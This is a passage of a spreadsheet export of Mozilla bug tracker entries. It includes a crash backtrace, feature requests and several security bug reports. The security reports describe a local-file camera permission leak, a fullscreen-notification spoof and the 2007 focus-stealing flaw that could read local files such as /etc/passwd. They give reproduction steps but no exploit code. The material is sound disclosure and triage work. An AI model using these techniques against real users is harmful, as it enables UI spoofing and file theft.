        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3769" t="inlineStr">
        <is>
          <t>Storage: IndexedDB</t>
        </is>
      </c>
      <c r="K3769" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3769" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3769" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3769" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3769" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3769" t="inlineStr">
        <is>
          <t>[qa-][adv-main27+]</t>
        </is>
      </c>
      <c r="Q3769" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3769" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3769" t="inlineStr">
        <is>
          <t>mozilla28</t>
        </is>
      </c>
      <c r="T3769" t="n">
        <v>1</v>
      </c>
      <c r="U3769" t="n">
        <v>0</v>
      </c>
      <c r="V3769" t="n">
        <v>41</v>
      </c>
      <c r="W3769" t="inlineStr">
        <is>
          <t>In Gaia e-mail we are doing exciting things with message sending where we build composite Blobs on a DOMWorker made out of some Strings and/or TypedArrays plus some Blobs we stashed in IndexedDB (and then postMessaged across to the worker).
I am able to reliably reproduce the following crash in our gaia e-mail backend tests which are being run under a linux x64 b2g-desktop build.  Because I am already trying to work around bug 932143 I know with high probability that the worker is dying because of a self.close() call and that the main page that owns it is probably still alive.  (Because if this wasn't what is happening, we would be crashing due to that bug.)
There's a pretty good chance the main thread JS code has already discarded its references to the IndexedDB Blobs, called close on the IndexedDB instance and forgotten about the IndexedDB instance too.  (The unit tests attempt a clean shutdown of our use of the database.)  I have no idea if a GC would have already happened on the main thread.  (In fact, the main thread holds very few references to the Blobs or the IndexedDB instance, all of the worker happens on the worker and we're just remoting calls to the main thread because we have to.)
Please feel free to ask me to run with any logging/DEBUG builds that would help, or if you'd like me to trace any code for suspiciousness.  This is probably going to block a koi+ blocker unless you think this can only happen on DOMWorker shutdown, in which case it's just an annoyance.  I'm not going to investigate anything right now since it sounded from khuey like this might be fairly clear cut.
#0  0x00002aaaacff32d6 in mozilla::dom::indexedDB::IndexedDatabaseManager::AddRef (this=this@entry=0x2aaad1dab5e0) at /home/visbrero/rev_control/fgit/mozilla-central/dom/indexedDB/IndexedDatabaseManager.cpp:726
#1  0x00002aaaacfd6e8a in nsRefPtr (aRawPtr=0x2aaad1dab5e0, this=&lt;synthetic pointer&gt;) at ../../dist/include/nsAutoPtr.h:911
#2  mozilla::dom::indexedDB::FileInfo::Cleanup (this=this@entry=0x2aaadb147df0) at /home/visbrero/rev_control/fgit/mozilla-central/dom/indexedDB/FileInfo.cpp:107
#3  0x00002aaaacfd6f76 in mozilla::dom::indexedDB::FileInfo::UpdateReferences (this=0x2aaadb147df0, aRefCount=..., aDelta=-1, aClear=&lt;optimized out&gt;) at /home/visbrero/rev_control/fgit/mozilla-central/dom/indexedDB/FileInfo.cpp:92
#4  0x00002aaaacd545b8 in ~nsRefPtr (this=0x2aaad7e60d90, __in_chrg=&lt;optimized out&gt;) at ../../../dist/include/nsAutoPtr.h:887
#5  Destruct (e=0x2aaad7e60d90) at ../../../dist/include/nsTArray.h:534
#6  DestructRange (count=4, start=0, this=0x2aaadaf3fee8) at ../../../dist/include/nsTArray.h:1573
#7  RemoveElementsAt (count=4, start=0, this=0x2aaadaf3fee8) at ../../../dist/include/nsTArray.h:1290
#8  Clear (this=0x2aaadaf3fee8) at ../../../dist/include/nsTArray.h:1301
#9  ~nsTArray_Impl (this=0x2aaadaf3fee8, __in_chrg=&lt;optimized out&gt;) at ../../../dist/include/nsTArray.h:752
#10 ~nsTArray (this=0x2aaadaf3fee8, __in_chrg=&lt;optimized out&gt;) at ../../../dist/include/nsTArray.h:1646
#11 nsDOMFileBase::~nsDOMFileBase (this=0x2aaadaf3fe80, __in_chrg=&lt;optimized out&gt;) at ../../../dist/include/nsDOMFile.h:121
#12 0x00002aaaacd546a3 in nsDOMMultipartFile::~nsDOMMultipartFile (this=0x2aaadaf3fe80, __in_chrg=&lt;optimized out&gt;) at /home/visbrero/rev_control/fgit/mozilla-central/content/base/src/nsDOMBlobBuilder.h:23
#13 0x00002aaaacd55fd2 in nsDOMFile::Release (this=0x2aaadaf3fe80) at /home/visbrero/rev_control/fgit/mozilla-central/content/base/src/nsDOMFile.cpp:461
#14 0x00002aaaadd93c9f in finalize (fop=0x2aaad8901900, this=0x2aaaddaa42b0) at /home/visbrero/rev_control/fgit/mozilla-central/js/src/jsobjinlines.h:89
#15 finalize&lt;JSObject&gt; (thingSize=48, thingKind=js::gc::FINALIZE_OBJECT2, fop=0x2aaad8901900, this=0x2aaaddaa4000) at /home/visbrero/rev_control/fgit/mozilla-central/js/src/jsgc.cpp:337
#16 FinalizeTypedArenas&lt;JSObject&gt; (dest=..., budget=..., thingKind=js::gc::FINALIZE_OBJECT2, src=0x2aaad89018a8, fop=0x2aaad8901900) at /home/visbrero/rev_control/fgit/mozilla-central/js/src/jsgc.cpp:401
#17 FinalizeArenas (fop=fop@entry=0x2aaad8901900, src=src@entry=0x2aaad89018a8, dest=..., thingKind=thingKind@entry=js::gc::FINALIZE_OBJECT2, budget=...) at /home/visbrero/rev_control/fgit/mozilla-central/js/src/jsgc.cpp:438
#18 0x00002aaaadd949f8 in finalizeNow (thingKind=js::gc::FINALIZE_OBJECT2, fop=0x2aaad8901900, this=0x2aaad80e7838) at /home/visbrero/rev_control/fgit/mozilla-central/js/src/jsgc.cpp:1340
#19 js::gc::ArenaLists::queueObjectsForSweep (this=this@entry=0x2aaad80e7838, fop=fop@entry=0x2aaad8901900) at /home/visbrero/rev_control/fgit/mozilla-central/js/src/jsgc.cpp:1436
#20 0x00002aaaadd94fd2 in BeginSweepingZoneGroup (rt=rt@entry=0x2aaad7cec000) at /home/visbrero/rev_control/fgit/mozilla-central/js/src/jsgc.cpp:3767
#21 0x00002aaaadd97ab1 in BeginSweepPhase (lastGC=true, rt=0x2aaad7cec000) at /home/visbrero/rev_control/fgit/mozilla-central/js/src/jsgc.cpp:3851
#22 IncrementalCollectSlice (rt=rt@entry=0x2aaad7cec000, budget=budget@entry=0, reason=reason@entry=JS::gcreason::DESTROY_RUNTIME, gckind=gckind@entry=js::GC_NORMAL) at /home/visbrero/rev_control/fgit/mozilla-central/js/src/jsgc.cpp:4410
#23 0x00002aaaadd98c68 in GCCycle (rt=rt@entry=0x2aaad7cec000, incremental=incremental@entry=false, budget=budget@entry=0, gckind=gckind@entry=js::GC_NORMAL, reason=reason@entry=JS::gcreason::DESTROY_RUNTIME) at /home/visbrero/rev_control/fgit/mozilla-central/js/src/jsgc.cpp:4555
#24 0x00002aaaadd990f5 in Collect (rt=rt@entry=0x2aaad7cec000, incremental=incremental@entry=false, budget=budget@entry=0, gckind=gckind@entry=js::GC_NORMAL, reason=reason@entry=JS::gcreason::DESTROY_RUNTIME) at /home/visbrero/rev_control/fgit/mozilla-central/js/src/jsgc.cpp:4699
#25 0x00002aaaadd9939d in Collect (reason=JS::gcreason::DESTROY_RUNTIME, gckind=js::GC_NORMAL, budget=0, incremental=false, rt=rt@entry=0x2aaad7cec000) at /home/visbrero/rev_control/fgit/mozilla-central/js/src/jsgc.cpp:4725
#26 js::GC (rt=rt@entry=0x2aaad7cec108, gckind=gckind@entry=js::GC_NORMAL, reason=reason@entry=JS::gcreason::DESTROY_RUNTIME) at /home/visbrero/rev_control/fgit/mozilla-central/js/src/jsgc.cpp:4724
#27 0x00002aaaade8ec7b in JSRuntime::~JSRuntime (this=0x2aaad7cec108, __in_chrg=&lt;optimized out&gt;) at /home/visbrero/rev_control/fgit/mozilla-central/js/src/vm/Runtime.cpp:443
#28 0x00002aaaadd391ce in js_delete&lt;JSRuntime&gt; (p=0x2aaad7cec000) at ../../dist/include/js/Utility.h:319
#29 JS_DestroyRuntime (rt=0x2aaad7cec000) at /home/visbrero/rev_control/fgit/mozilla-central/js/src/jsapi.cpp:743
#30 0x00002aaaad73811e in mozilla::CycleCollectedJSRuntime::DestroyRuntime (this=this@entry=0x2aaad8901ca0) at /home/visbrero/rev_control/fgit/mozilla-central/xpcom/base/CycleCollectedJSRuntime.cpp:472
#31 0x00002aaaad738aef in mozilla::CycleCollectedJSRuntime::~CycleCollectedJSRuntime (this=0x2aaad8901ca0, __in_chrg=&lt;optimized out&gt;) at /home/visbrero/rev_control/fgit/mozilla-central/xpcom/base/CycleCollectedJSRuntime.cpp:480
#32 0x00002aaaacfbc49b in (anonymous namespace)::WorkerThreadRunnable::Run (this=&lt;optimized out&gt;) at /home/visbrero/rev_control/fgit/mozilla-central/dom/workers/RuntimeService.cpp:946
#33 0x00002aaaad7346f0 in nsThread::ProcessNextEvent (this=0x2aaad7bc9ce0, mayWait=&lt;optimized out&gt;, result=0x2aaad8901e2f) at /home/visbrero/rev_control/fgit/mozilla-central/xpcom/threads/nsThread.cpp:622
#34 0x00002aaaad7064bf in NS_ProcessNextEvent (thread=&lt;optimized out&gt;, thread@entry=0x2aaad7bc9ce0, mayWait=mayWait@entry=true) at /home/visbrero/rev_control/fgit/mozilla-central/xpcom/glue/nsThreadUtils.cpp:251
#35 0x00002aaaad734d99 in nsThread::ThreadFunc (arg=0x2aaad7bc9ce0) at /home/visbrero/rev_control/fgit/mozilla-central/xpcom/threads/nsThread.cpp:250
#36 0x00002aaaabf92cc2 in _pt_root (arg=0x2aaabee55020) at /home/visbrero/rev_control/fgit/mozilla-central/nsprpub/pr/src/pthreads/ptthread.c:204
#37 0x00002aaaaacd7f6e in start_thread (arg=0x2aaad8902700) at pthread_create.c:311
#38 0x00002aaaab7f39cd in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:113</t>
        </is>
      </c>
      <c r="X3769" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3770">
      <c r="A3770" t="n">
        <v>1811181</v>
      </c>
      <c r="B3770" t="inlineStr">
        <is>
          <t>2023-01-18 23:50:47 -0800</t>
        </is>
      </c>
      <c r="C3770" t="inlineStr">
        <is>
          <t>Giving the camera permission to a local .html file means giving this permission to all the local .html files opened in the same tab</t>
        </is>
      </c>
      <c r="D3770" t="inlineStr">
        <is>
          <t>2024-05-30 11:04:17 -0700</t>
        </is>
      </c>
      <c r="E3770" t="n">
        <v>1</v>
      </c>
      <c r="F3770" t="n">
        <v>1</v>
      </c>
      <c r="G3770" t="n">
        <v>2</v>
      </c>
      <c r="H3770" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3770" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3770" t="inlineStr">
        <is>
          <t>Site Permissions</t>
        </is>
      </c>
      <c r="K3770" t="inlineStr">
        <is>
          <t>Firefox 109</t>
        </is>
      </c>
      <c r="L3770" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3770" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3770" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3770" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3770" t="inlineStr">
        <is>
          <t>[adv-main111+]</t>
        </is>
      </c>
      <c r="Q3770" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3770" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S3770" t="inlineStr">
        <is>
          <t>112 Branch</t>
        </is>
      </c>
      <c r="T3770" t="n">
        <v>1</v>
      </c>
      <c r="U3770" t="n">
        <v>0</v>
      </c>
      <c r="V3770" t="n">
        <v>26</v>
      </c>
      <c r="W3770" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Steps to reproduce:
Create two local .html files with two different names and the same code lines:
```HTML
&lt;div id="container"&gt;
    &lt;h1&gt;&lt;a href="//webrtc.github.io/samples/" title="WebRTC samples homepage"&gt;WebRTC samples&lt;/a&gt;
        &lt;span&gt;getUserMedia&lt;/span&gt;&lt;/h1&gt;
    &lt;video id="gum-local" autoplay playsinline&gt;&lt;/video&gt;
    &lt;button id="showVideo"&gt;Open camera&lt;/button&gt;
&lt;/div&gt;
&lt;script src="https://webrtc.github.io/samples/src/content/getusermedia/gum/js/main.js"&gt;&lt;/script&gt;
```
Open the first .html file on Firefox, give the camera permission to the file, open the second .html file, the second .html file is granted the camera permission automatically.
Video of demonstration: please download from this link to watch a high-definition video: https://drive.google.com/file/d/1YSdgDrxYTQZm2xLn86Q2cLTfdvtgZXKe/view?usp=sharing.
Actual results:
Giving the camera permission to a local .html file means giving this permission to all the local .html files.
Expected results:
Should ask for giving the camera permission on each local .html file.</t>
        </is>
      </c>
      <c r="X3770" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3771">
      <c r="A3771" t="n">
        <v>1550534</v>
      </c>
      <c r="B3771" t="inlineStr">
        <is>
          <t>2019-05-09 10:19:45 -0700</t>
        </is>
      </c>
      <c r="C3771" t="inlineStr">
        <is>
          <t>google cloud storage for local dev environment</t>
        </is>
      </c>
      <c r="D3771" t="inlineStr">
        <is>
          <t>2024-03-18 13:47:13 -0700</t>
        </is>
      </c>
      <c r="E3771" t="n">
        <v>1</v>
      </c>
      <c r="F3771" t="n">
        <v>1</v>
      </c>
      <c r="G3771" t="n">
        <v>4</v>
      </c>
      <c r="H3771" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3771" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J3771" t="inlineStr">
        <is>
          <t>Antenna</t>
        </is>
      </c>
      <c r="K3771" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3771" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3771" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3771" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3771" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3771" t="inlineStr"/>
      <c r="Q3771" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3771" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3771" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3771" t="n">
        <v>1</v>
      </c>
      <c r="U3771" t="n">
        <v>0</v>
      </c>
      <c r="V3771" t="n">
        <v>10</v>
      </c>
      <c r="W3771" t="inlineStr">
        <is>
          <t>Tecken and Socorro both need to access Google Cloud Storage (gcs) when we switch to Google Cloud Platform. One of the things that would make writing and maintaining the gcs code a lot easier is being able to run a close-enough service in the local dev environment that mimics gcs.
For pub/sub, we're using the pub/sub emulator. That works super.
This bug covers figuring out how we can run a close-enough gcs emulator thing in the local dev environment to support gcs-related work.</t>
        </is>
      </c>
      <c r="X3771" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3772">
      <c r="A3772" t="n">
        <v>1730750</v>
      </c>
      <c r="B3772" t="inlineStr">
        <is>
          <t>2021-09-14 11:47:29 -0700</t>
        </is>
      </c>
      <c r="C3772" t="inlineStr">
        <is>
          <t>Invoke Element.requestFullscreen then navigate to page on bfcache wouldn't show fullscreen security notification</t>
        </is>
      </c>
      <c r="D3772" t="inlineStr">
        <is>
          <t>2024-05-30 10:36:33 -0700</t>
        </is>
      </c>
      <c r="E3772" t="n">
        <v>1</v>
      </c>
      <c r="F3772" t="n">
        <v>1</v>
      </c>
      <c r="G3772" t="n">
        <v>3</v>
      </c>
      <c r="H3772" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3772" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3772" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K3772" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3772" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3772" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3772" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3772" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3772" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][sec-survey][post-critsmash-triage][adv-main94+][adv-esr91.3+]</t>
        </is>
      </c>
      <c r="Q3772" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3772" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S3772" t="inlineStr">
        <is>
          <t>95 Branch</t>
        </is>
      </c>
      <c r="T3772" t="n">
        <v>1</v>
      </c>
      <c r="U3772" t="n">
        <v>0</v>
      </c>
      <c r="V3772" t="n">
        <v>24</v>
      </c>
      <c r="W3772" t="inlineStr">
        <is>
          <t>Created attachment 9241190
fullscreen-spoof-form.html
After call `element.requestFullScreen()` then subsequently navigate to page in bfcache (e.g. using `HTMLFormElement.submit()`, `location.href`, or `window.location.back()`, and etc.) the browser goes into fullscreen without any fullscreen notification ("&lt;domain&gt; is now in fullscreen") as user unaware page displayed fullscreen it can leads to address bar UI spoofing.
I've tested this it works everytime I pressed the requestFullScreen button on the testcase using Windows 10 (on my laptop and VM). However on Linux (tested on KDE and GDM) it still require couple of button click to successfully turn browser into fullscreen.
When checking with mozregression I found the browser goes into fullscreen without security notification is after commit [Bug 1669961 - Return null from `.contentWindow` when inner window is inactive](https://hg.mozilla.org/integration/autoland/rev/befecdb77ef7e391ebfe8bcf46d9ce32d1172945). I observe before the commit Firefox will exit the fullscreen mode instead of goes into fullscreen.
## Steps to reproduce:
1. Visit attached fullscreen-spoof-form.html
2. Click "requestFullScreen" button
3. Browser goes into fullscreen without any fullscreen notification</t>
        </is>
      </c>
      <c r="X3772" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3773">
      <c r="A3773" t="n">
        <v>370092</v>
      </c>
      <c r="B3773" t="inlineStr">
        <is>
          <t>2007-02-11 14:00:51 -0800</t>
        </is>
      </c>
      <c r="C3773" t="inlineStr">
        <is>
          <t>Focus change between onKeyDown and onKeyPress, allowing to read arbitary files using &lt;input type=file&gt; (Zalewski Firefox focus stealing vulnerability)</t>
        </is>
      </c>
      <c r="D3773" t="inlineStr">
        <is>
          <t>2007-10-18 04:35:47 -0700</t>
        </is>
      </c>
      <c r="E3773" t="n">
        <v>1</v>
      </c>
      <c r="F3773" t="n">
        <v>1</v>
      </c>
      <c r="G3773" t="n">
        <v>3</v>
      </c>
      <c r="H3773" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3773" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3773" t="inlineStr">
        <is>
          <t>Layout: Form Controls</t>
        </is>
      </c>
      <c r="K3773" t="inlineStr">
        <is>
          <t>1.8 Branch</t>
        </is>
      </c>
      <c r="L3773" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3773" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3773" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3773" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3773" t="inlineStr">
        <is>
          <t>[sg:moderate]</t>
        </is>
      </c>
      <c r="Q3773" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3773" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3773" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3773" t="n">
        <v>1</v>
      </c>
      <c r="U3773" t="n">
        <v>0</v>
      </c>
      <c r="V3773" t="n">
        <v>33</v>
      </c>
      <c r="W3773" t="inlineStr">
        <is>
          <t>Focus change allowed between onKeyDown and onKeyPress,
allowing attacker to read arbitary files,
abusing &lt;input type=file&gt; with user input
From: Michal Zalewski &lt;lcamtuf@dione.ids.pl&gt;
To: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Date: Sun, 11 Feb 2007 21:00:45 +0100 (CET)
Message-ID: &lt;Pine.LNX.4.58.0702112047050.30989@dione&gt;
There is an interesting logic flaw in Mozilla Firefox web browser.
The vulnerability allows the attacker to silently redirect focus of
selected key press events to an otherwise protected file upload form
field. This is possible because of how onKeyDown / onKeyPress events are
handled, allowing the focus to be moved between the two. If exploited,
this enables the attacker to read arbitrary files on victim's system.
This was tested with 2.0.0.1. Opera is most likely not vulnerable;
Microsoft Internet Explorer is not vulnerable as-is, but might be
vulnerable to a variant of the attack.
All INPUT TYPE=FILE form fields enjoy the benefits of added protection to
prvent scripts from arbitrarily choosing local files to be uploaded to the
server, and automatically submitting the form. For example, .value
parameter cannot be set or changed, and any changes to .type reset the
contents of the field.
Unfortunately, Firefox allows a malicious script to redirect carefully
selected, individual user keystrokes to a hidden file upload field, in
order to compose a particular filename, then submit the form. User
interaction is required, limiting the impact somewhat - but any website
where the user can be reasonably expected to enter some text (a
keyboard-controlled web game, a blog posting or commenting interface) can
attempt to exploit the vulnerability, and eventually succeed with one user
or another.
A quick and naive demonstration of the problem (Firefox on Windows is
required;  depends on scancode values, so not all keyboards may be
supported):
  http://lcamtuf.coredump.cx/focusbug/
(Ta-dah again)
/mz
---
And indeed - here's a MSIE 7.0 demo:
http://lcamtuf.coredump.cx/focusbug/ieversion.html
Somewhat less pretty and straightforward, but equally sad.
/mz
---
pdp (architect) wrote:
&gt; &gt; here is an idea... we can combine both techniques into a single
&gt; &gt; attack... the hardest part of your hack is to force the user to type
&gt; &gt; :// plus several other /
Actually, MSIE doesn't require drive specification in the filename, and
will probably accept relative paths as well (so you might not need \
either when picking files from the desktop or 'my documents' or whatnot).
Firefox won't settle for a path without drive specification (but it will
accept SMB requests  ;-) . On *nix systems, of course, aiming /etc/passwd is
easier than C:\whatever.
The problem with intercepting address bar input is that you can't echo the
entered text back there without unloading the current document and its
scripts; in my examples, I tried to make sure that it's hard for the user
to notice that his input is not going where it should (in MSIE example,
this includes simulation of a blinking cursor).
---
[Similar is IE bug] MS00-093, but that's long fixed. [...]
/mz
---
On Sun, 11 Feb 2007, Michal Zalewski wrote:
&gt; &gt; http://lcamtuf.coredump.cx/focusbug/index.html (FF)
&gt; &gt; http://lcamtuf.coredump.cx/focusbug/ieversion.html (MSIE)
Paul Szabo pointed out that this is related to exploits posted by Charles
McAuley and Bart van Arnhem in June 2006 (CVE-2006-2894). These guys did
not demonstrate a complete attack, and their examples do not seem to work
well with MSIE 7 (which might be because of a half-assed attempt to fix
the problem, or perhaps not) - but a credit quite certainly is due.
Original postings:
  http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046610.html
  http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046699.html
Cheers,
/mz</t>
        </is>
      </c>
      <c r="X3773" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3774">
      <c r="A3774" t="n">
        <v>1613158</v>
      </c>
      <c r="B3774" t="inlineStr">
        <is>
          <t>2020-02-04 07:43:54 -0800</t>
        </is>
      </c>
      <c r="C3774" t="inlineStr">
        <is>
          <t>Interation Sprint for Firefox Private Network</t>
        </is>
      </c>
      <c r="D3774" t="inlineStr">
        <is>
          <t>2020-03-03 13:11:41 -0800</t>
        </is>
      </c>
      <c r="E3774" t="n">
        <v>1</v>
      </c>
      <c r="F3774" t="n">
        <v>1</v>
      </c>
      <c r="G3774" t="n">
        <v>5</v>
      </c>
      <c r="H3774" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3774" t="inlineStr">
        <is>
          <t>User Research</t>
        </is>
      </c>
      <c r="J3774" t="inlineStr">
        <is>
          <t>Project Request</t>
        </is>
      </c>
      <c r="K3774" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3774" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3774" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3774" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3774" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3774" t="inlineStr"/>
      <c r="Q3774" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3774" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3774" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3774" t="n">
        <v>1</v>
      </c>
      <c r="U3774" t="n">
        <v>0</v>
      </c>
      <c r="V3774" t="n">
        <v>4</v>
      </c>
      <c r="W3774" t="inlineStr">
        <is>
          <t>**Request Description** 
In order to accelerate the design, evaluation and refinement for the FPN:Proxy, we would like to run an iteration sprint wherein we conduct a series of user research tests over a five day period intended to help us produce a design that will be used in in the next iteration of the FPN:Proxy.
**Deadline** 
The team discussed this work happening Feb 14th-21st
**Priority Level** 
1
**Priority Level Description** 
This work will drive Q1 engineering for the FPN and will put us a great deal closer to evaluating the proxy as a possible revenue-generating project. To wit, running this test soon unlocks a series of important decisions around the future of the FPN program.
**Supporting Information**</t>
        </is>
      </c>
      <c r="X3774" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3775">
      <c r="A3775" t="n">
        <v>684436</v>
      </c>
      <c r="B3775" t="inlineStr">
        <is>
          <t>2011-09-02 19:06:47 -0700</t>
        </is>
      </c>
      <c r="C3775" t="inlineStr">
        <is>
          <t>Stop merging builds for pushes within 3 minutes of each other</t>
        </is>
      </c>
      <c r="D3775" t="inlineStr">
        <is>
          <t>2014-06-11 09:08:33 -0700</t>
        </is>
      </c>
      <c r="E3775" t="n">
        <v>1</v>
      </c>
      <c r="F3775" t="n">
        <v>1</v>
      </c>
      <c r="G3775" t="n">
        <v>5</v>
      </c>
      <c r="H3775" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3775" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3775" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3775" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3775" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3775" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3775" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3775" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3775" t="inlineStr"/>
      <c r="Q3775" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3775" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3775" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3775" t="n">
        <v>1</v>
      </c>
      <c r="U3775" t="n">
        <v>0</v>
      </c>
      <c r="V3775" t="n">
        <v>7</v>
      </c>
      <c r="W3775" t="inlineStr">
        <is>
          <t>Tonight makes two nights in a row where mozilla-inbound has had bustage, but yet excessive numbers of changesets have had to be backed out, since their builds have been combined (due to being within 3 minutes of each other).
Mak, myself and others certain others sherrifing m-i feel that the advantages of coalescing builds within 3 minutes is vastly outweighed by the confusion of blame.
Yes, it may rarely save one extra build, but more frequently it results in numerous extra builds after backing out one changeset after another, in order to find the cause of bustage.
Please can this be stopped.</t>
        </is>
      </c>
      <c r="X3775" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3776">
      <c r="A3776" t="n">
        <v>1821576</v>
      </c>
      <c r="B3776" t="inlineStr">
        <is>
          <t>2023-03-09 19:16:53 -0800</t>
        </is>
      </c>
      <c r="C3776" t="inlineStr">
        <is>
          <t>safety browsing alert notification hides fullscreen notification on  firefoxfocus, leads to spoof</t>
        </is>
      </c>
      <c r="D3776" t="inlineStr">
        <is>
          <t>2024-05-30 11:06:37 -0700</t>
        </is>
      </c>
      <c r="E3776" t="n">
        <v>1</v>
      </c>
      <c r="F3776" t="n">
        <v>1</v>
      </c>
      <c r="G3776" t="n">
        <v>2</v>
      </c>
      <c r="H3776" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3776" t="inlineStr">
        <is>
          <t>Focus</t>
        </is>
      </c>
      <c r="J3776" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3776" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3776" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3776" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3776" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3776" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3776" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?]</t>
        </is>
      </c>
      <c r="Q3776" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3776" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S3776" t="inlineStr">
        <is>
